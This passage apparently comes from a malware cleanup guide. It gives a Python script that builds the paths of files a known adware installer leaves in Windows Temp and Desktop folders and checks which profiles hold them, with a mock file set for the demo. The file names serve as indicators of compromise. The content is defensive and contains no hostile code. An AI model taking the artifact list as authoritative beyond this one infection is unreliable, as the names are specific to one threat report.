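REPORT_FILES = [
    r"%Documents and Settings%\%current user%\Local Settings\Temp\cpSetup.exe",
    r"%Documents and Settings%\%current user%\Local Settings\Temp\ii_start.txt",
    r"%Documents and Settings%\%current user%\Local Settings\Temp\Setup__2140_il65.exe",
    r"%Documents and Settings%\%current user%\Local Settings\Temp\amipixel.cfg",
    r"%Documents and Settings%\%current user%\Desktop\Continue installation .lnk",
]

# (profile root, folder that replaces the XP "Local Settings\Temp")
LAYOUTS = {
    "xp": (r"C:\Documents and Settings", r"Local Settings\Temp"),
    "modern": (r"C:\Users", r"AppData\Local\Temp"),
}


def expand(report_path, user, layout):
    """Turn a report placeholder path into a concrete path for one profile."""
    root, temp = LAYOUTS[layout]
    path = (report_path.replace("%Documents and Settings%", root)
                       .replace("%current user%", user))
    return path.replace(r"Local Settings\Temp", temp)


def sweep(users, exists=os.path.exists, layouts=("xp", "modern")):
    """Return (user, concrete_path) for every report entry present on the host.

    NTFS is case-insensitive; os.path.exists on Windows honours that, an injected
    checker must do the same if it is fed paths of mixed case.
    """
    hits = []
    for user in users:
        for layout in layouts:
            for entry in REPORT_FILES:
                path = expand(entry, user, layout)
                if exists(path):
                    hits.append((user, path))
    return hits


# Constructed file set standing in for a host with one modern and one XP-style profile.
FAKE_FS = {
    r"C:\Users\alice\AppData\Local\Temp\cpSetup.exe",
    r"C:\Users\alice\Desktop\Continue installation .lnk",
    r"C:\Documents and Settings\bob\Local Settings\Temp\ii_start.txt",
}

if __name__ == "__main__":
    for user, path in sweep(["alice", "bob"], exists=lambda p: p in FAKE_FS):
        print(user, path)
```

Run it before terminating anything to see which profiles are involved, and again after step 5 to confirm the Desktop shortcut is gone: "Continue installation .lnk" is the hook that re-launches the installer from Temp if the user clicks it, so it must be removed together with the file it points at.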
